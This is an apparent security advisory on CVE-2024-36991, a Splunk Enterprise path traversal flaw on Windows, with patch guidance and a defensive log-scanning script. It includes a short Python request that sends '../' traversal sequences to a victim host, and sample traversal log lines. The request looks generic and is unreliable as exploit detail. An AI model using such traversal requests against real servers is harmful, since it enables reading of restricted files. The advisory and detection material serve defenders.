CVE-2024-36991: Path Traversal Vulnerability in Splunk Enterprise on Windows

A new vulnerability, CVE-2024-36991, has been identified in Splunk Enterprise on the Windows platform. The flaw, which affects versions below 9.2.2, 9.1.5, and 9.0.10, enables an attacker to perform a path traversal attack on the /modules/messaging/ endpoint. This vulnerability is specific to Splunk Enterprise running on Windows.

Background and Description of the Vulnerability

Splunk Enterprise is a powerful tool for collecting and analyzing machine-generated data in real time. As part of its design, the software comes with numerous endpoints that can be used for data analysis and management. One of these endpoints is /modules/messaging/. Due to a misconfiguration in the affected versions, this endpoint becomes a potential target for a path traversal attack.

A path traversal attack, often referred to as "directory traversal," allows an attacker to access files and directories on the server that should be restricted. By manipulating the URL and exploiting the vulnerable endpoint, an attacker can read and possibly manipulate sensitive data stored on the server.

Exploit Details

The path traversal vulnerability is exploitable in the following Splunk Enterprise versions on Windows:

Versions below 9.2.2, 9.1.5, and 9.0.10

Note that this flaw does not affect Splunk Enterprise on non-Windows platforms.

To exploit this vulnerability, an attacker simply needs to send a carefully crafted HTTP GET request to the vulnerable endpoint:

import requests

target = "http://victim.com:808"
endpoint = "/modules/messaging/"
path_to_file = "../../../../../../../PATH_TO_TARGET_FILE"

payload = {
  "param": path_to_file
}

response = requests.get(f"{target}{endpoint}", params=payload)
print(response.text)

Using this technique, an attacker can access sensitive files and potentially compromise the security of the Splunk Enterprise installation on the Windows server.

Mitigation and Patch Information

To address this vulnerability, Splunk has released patches for affected version branches. Users running Splunk Enterprise on Windows are strongly encouraged to update their installations as soon as possible to the following patched versions:

9.2.2, 9.1.5, and 9.0.10 and above

Moreover, be sure to follow best practices for server hardening to reduce the chance of future vulnerabilities.
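
Until every Windows instance is patched, web access logs can be reviewed for requests to /modules/messaging/ that carry traversal sequences. The following is an added example, not code from the original article or from Splunk: the combined-log-style line format, the function names and the sample lines are assumptions constructed for illustration. It goes slightly beyond the request shown above by also decoding percent-encoded and backslash forms of "../".

```python
import re
from urllib.parse import unquote

ENDPOINT = "/modules/messaging/"  # endpoint named in the article
# Traversal markers after decoding: "../" or "..\" (Windows accepts both separators)
TRAVERSAL = re.compile(r"\.\.[/\\]")
# Request portion of a combined-log-style line (assumed format, adjust to your logs)
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(uri, max_rounds=3):
    """Percent-decode repeatedly so double-encoded sequences are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def find_traversal_attempts(lines):
    """Return (ip, status, decoded_uri) for suspicious requests to ENDPOINT."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        uri = fully_decode(m.group("uri"))
        # Normalise case and separators before looking for the endpoint
        normalised = uri.replace("\\", "/").lower()
        if ENDPOINT in normalised and TRAVERSAL.search(uri):
            hits.append((m.group("ip"), int(m.group("status")), uri))
    return hits

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Jul/2024:10:01:12 +0000] "GET /modules/messaging/?param=../../../../PATH_TO_TARGET_FILE HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Jul/2024:10:01:15 +0000] "GET /modules/messaging/?param=%2e%2e%5c%2e%2e%5cPATH_TO_TARGET_FILE HTTP/1.1" 404 0',
    '203.0.113.20 - - [02/Jul/2024:10:02:40 +0000] "GET /modules/messaging/?param=%252e%252e%252fPATH_TO_TARGET_FILE HTTP/1.1" 200 77',
    '192.0.2.44 - - [02/Jul/2024:10:03:02 +0000] "GET /en-US/app/search/search HTTP/1.1" 200 9001',
    '192.0.2.44 - - [02/Jul/2024:10:03:09 +0000] "GET /en-US/static/../app.js HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for ip, status, uri in find_traversal_attempts(SAMPLE_LOG):
        note = "served (review response)" if status == 200 else "rejected"
        print(f"{ip} {status} {note}: {uri}")
```

Hits that returned status 200 deserve priority, since the server answered the request rather than rejecting it.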

Wrap Up

In conclusion, the path traversal vulnerability (CVE-2024-36991) identified in Splunk Enterprise on Windows can have serious consequences if exploited. It is crucial that users running affected versions promptly update their installations to protected versions. By staying abreast of security updates and best practices, administrators can ensure the continued security and operational efficiency of their Splunk Enterprise installations.

Timeline

Published on: 07/01/2024 17:15:07 UTC
Last modified on: 07/22/2024 15:00:45 UTC